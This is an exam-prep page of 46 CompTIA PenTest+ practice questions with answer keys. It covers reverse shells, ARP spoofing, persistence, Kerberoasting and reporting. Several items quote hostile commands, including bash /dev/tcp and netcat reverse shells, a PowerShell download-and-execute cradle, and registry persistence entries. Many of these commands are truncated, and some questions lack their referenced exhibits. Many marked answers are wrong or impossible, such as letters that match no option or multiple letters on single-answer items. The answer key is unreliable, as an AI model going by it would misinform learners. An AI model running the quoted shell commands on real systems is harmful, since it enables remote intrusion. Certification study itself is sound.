DON'T WANT TO MISS A THING?

Certification Exam Passing Tips

Latest exam news and discount info

Curated and up-to-date by our experts

Yes, send me the newsletter

CompTIA PT0-001 Certification Exam Questions & Answers, CompTIA PenTest+ Certification | SPOTO

Prepare for the CompTIA PenTest+ (PT0-001) certification exam with our comprehensive resources. Our practice tests, featuring the latest exam questions, are designed to help you excel in your preparation journey. The PT0-001 certification is unique in its focus on hands-on ability, testing candidates in diverse environments including the cloud and mobile platforms, alongside traditional desktops and servers. By practicing with our exam questions, sample questions, and exam dumps, you'll gain a deep understanding of the exam content and be well-prepared to tackle the challenges. Our mock exams and exam simulator further enhance your readiness, ensuring you're equipped to succeed on exam day. Take advantage of our exam materials and exam answers to boost your confidence and achieve your CompTIA PenTest+ certification goals.
Take other online exams

Question #1
A penetration tester executes the following commands: Which of the following is a local host vulnerability that the attacker is exploiting?
A. Insecure file permissions
B. Application whitelisting
C. Shell escape
D. Writable service
View answer
Correct Answer: D
Question #2
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
A. Appendices
B. Executive summary
C. Technical summary
D. Main body
View answer
Correct Answer: B
Question #3
Given the following Python script: Which of the following is where the output will go?
A. To the screen
B. To a network server
C. To a file
D. To /dev/null
View answer
Correct Answer: A
Question #4
A penetration tester is reviewing the following output from a wireless sniffer: Which of the following can be extrapolated from the above information?
A. Hardware vendor
B. Channel interference
C. Usernames
D. Key strength
View answer
Correct Answer: ACG
Question #5
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
A. From the remote computer, run the following commands: export XHOST 192
B. From the local computer, run the following command: ssh -L4444:127
C. From the remote computer, run the following command: ssh -R6000:127
D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192
View answer
Correct Answer: D
Question #6
A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?
A. Rules of engagement
B. Request for proposal
C. Master service agreement
D. Business impact analysis
View answer
Correct Answer: A
Question #7
A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?
A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems
B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test
C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS
View answer
Correct Answer: A
Question #8
Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?
A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass
View answer
Correct Answer: A
Question #9
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
A. MAC address of the client
B. MAC address of the domain controller
C. MAC address of the web server
D. MAC address of the gateway
View answer
Correct Answer: A
Question #10
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
View answer
Correct Answer: AB
Question #11
Which of the following tools is used to perform a credential brute force attack?
A. Hydra
B. John the Ripper
C. Hashcat
D. Peach
View answer
Correct Answer: D
Question #12
A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).
A. Cleartext exposure of SNMP trap data
B. Software bugs resident in the IT ticketing system
C. S/MIME certificate templates defined by the CA
D. Health information communicated over HTTP
E. DAR encryption on records servers
View answer
Correct Answer: A
Question #13
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
View answer
Correct Answer: A
Question #14
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
View answer
Correct Answer: D
Question #15
A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?
A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation
B. Identify the issues that can be remediated most quickly and address them first
C. Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities
D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime
View answer
Correct Answer: B
Question #16
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
A. arpspoof
B. nmap
C. responder
D. burpsuite
View answer
Correct Answer: A
Question #17
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security
B. Enable a secure cookie flag
C. Encrypt the communication channel
D. Sanitize invalid user input
View answer
Correct Answer: C
Question #18
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ’’changepass.” -sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass Using “strings" to print ASCII printable characters from changepass, the tester notes the following: $ strings changepass exit setuid strcmp GLIBC_2.0 ENV_PATH %s/changepw malloc strlen Given this information, which of the following is the MOST likely path of exploitation to achieve root p
A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw
B. Create a copy of changepass in the same directory, naming it changepw
C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'
View answer
Correct Answer: A
Question #19
Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
A. Creating a scope of the critical production systems
B. Setting a schedule of testing access times
C. Establishing a white-box testing engagement
D. Having management sign off on intrusive testing
View answer
Correct Answer: C
Question #20
In which of the following scenarios would a tester perform a Kerberoasting attack?
A. The tester has compromised a Windows device and dumps the LSA secrets
B. The tester needs to retrieve the SAM database and crack the password hashes
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system
View answer
Correct Answer: B
Question #21
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
A. Disable the network port of the affected service
B. Complete all findings, and then submit them to the client
C. Promptly alert the client with details of the finding
D. Take the target offline so it cannot be exploited by an attacker
View answer
Correct Answer: D
Question #22
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?
A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file
View answer
Correct Answer: A
Question #23
Which of the following excerpts would come from a corporate policy?
A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric
B. The help desk can be reached at 800-passwd1 to perform password resets
C. Employees must use strong passwords for accessing corporate assets
D. The corporate systems must store passwords using the MD5 hashing algorithm
View answer
Correct Answer: B
Question #24
The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Which of the following describes what the command does?
A. Performs a port scan
B. Grabs the web server's banner
C. Redirects a TTY to a remote system
D. Removes error logs for the supplied IP
View answer
Correct Answer: AC
Question #25
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).
A. Mandate all employees take security awareness training
B. Implement two-factor authentication for remote access
C. Install an intrusion prevention system
D. Increase password complexity requirements
E. Install a security information event monitoring solution
F. Prevent members of the IT department from interactively logging in as administrators
G. Upgrade the cipher suite used for the VPN solution
View answer
Correct Answer: A
Question #26
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
A. Perform an HTTP downgrade attack
B. Harvest the user credentials to decrypt traffic
C. Perform an MITM attack
D. Implement a CA attack by impersonating trusted CAs
View answer
Correct Answer: A
Question #27
Consider the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1”);Invoke-Cmdlet Which of the following BEST describes the actions performed by this command?
A. Set the execution policy
B. Execute a remote script
C. Run an encoded command
D. Instantiate an object
View answer
Correct Answer: C
Question #28
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
View answer
Correct Answer: DE
Question #29
A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?
A. Transition the application to another port
B. Filter port 443 to specific IP addresses
C. Implement a web application firewall
D. Disable unneeded services
View answer
Correct Answer: D
Question #30
A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
A. Discovery scan
B. Stealth scan
C. Full scan
D. Credentialed scan
View answer
Correct Answer: B
Question #31
A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy: Which of the following types of vulnerabilities is being exploited?
A. Forced browsing vulnerability
B. Parameter pollution vulnerability
C. File upload vulnerability
D. Cookie enumeration
View answer
Correct Answer: A
Question #32
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
A. Locating emergency exits
B. Preparing a pretext
C. Shoulder surfing the victim
D. Tailgating the victim
View answer
Correct Answer: A
Question #33
A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0. Which of the following levels of difficulty would be required to exploit this vulnerability?
A. Very difficult; perimeter systems are usually behind a firewall
B. Somewhat difficult; would require significant processing power to exploit
C. Trivial; little effort is required to exploit this finding
D. Impossible; external hosts are hardened to protect against attacks
View answer
Correct Answer: C
Question #34
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below: IP: 192.168.1.20 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168.1.254 DHCP: 192.168.1.253 DNS: 192.168.10.10, 192.168.20.10 Which of the following commands should the malicious user execute to perform the MITM attack?
A. arpspoof -c both -r -t 192
B. arpspoof -t 192
C. arpspoof -c both -t 192
D. arpspoof -r -t 192
View answer
Correct Answer: D
Question #35
A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)
A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d
B. Place an entry in C:\windows\system32\drivers\etc\hosts for 12
C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d
D. Create a fake service in Windows called RTAudio to execute manually
E. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio
F. Create a schedule task to call C:\windows\system32\drivers\etc\hosts
View answer
Correct Answer: AC
Question #36
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
A. Randomize the credentials used to log in
B. Install host-based intrusion detection
C. Implement input normalization
D. Perform system hardening
View answer
Correct Answer: AE
Question #37
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
A. Shodan
B. SET
C. BeEF
D. Wireshark
E. Maltego
F. Dynamo
View answer
Correct Answer: CD
Question #38
Which of the following is the reason why a penetration tester would run thechkconfig --del servicename command at the end of an engagement?
A. To remove the persistence
B. To enable persistence
C. To report persistence
D. To check for persistence
View answer
Correct Answer: A
Question #39
Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)
A. The tester discovers personally identifiable data on the system
B. The system shows evidence of prior unauthorized compromise
C. The system shows a lack of hardening throughout
D. The system becomes unavailable following an attempted exploit
E. The tester discovers a finding on an out-of-scope system
View answer
Correct Answer: A
Question #40
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
A. nmap -p 53 -oG dnslist
B. nslookup -ns 8
C. for x in {1
D. dig -r > echo “8
View answer
Correct Answer: D
Question #41
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
A. Command injection attack
B. Clickjacking attack
C. Directory traversal attack
D. Remote file inclusion attack
View answer
Correct Answer: D
Question #42
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
A. Stored XSS
B. Fill path disclosure
C. Expired certificate
D. Clickjacking
View answer
Correct Answer: D
Question #43
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A. perl -e 'use SOCKET'; $i='; $p='443;
B. ssh superadmin@ -p 443
C. nc -e /bin/sh 443
D. bash -i >& /dev/tcp//443 0>&1
View answer
Correct Answer: D
Question #44
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
A. To remove the persistence
B. To enable persistence
C. To report persistence
D. To check for persistence
View answer
Correct Answer: A
Question #45
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
A. ICS vendors are slow to implement adequate security controls
B. ICS staff are not adequately trained to perform basic duties
C. There is a scarcity of replacement equipment for critical devices
D. There is a lack of compliance for ICS facilities
View answer
Correct Answer: B
Question #46
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
A. Manufacturers developing IoT devices are less concerned with security
B. It is difficult for administrators to implement the same security standards across the board
C. IoT systems often lack the hardware power required by more secure solutions
D. Regulatory authorities often have lower security requirements for IoT systems
View answer
Correct Answer: A

View Answers after Submission

Please submit your email and WhatsApp to get the answers of questions.

Note: Please make sure your email ID and Whatsapp are valid so that you can get the correct exam results.

Email:
Whatsapp/phone number: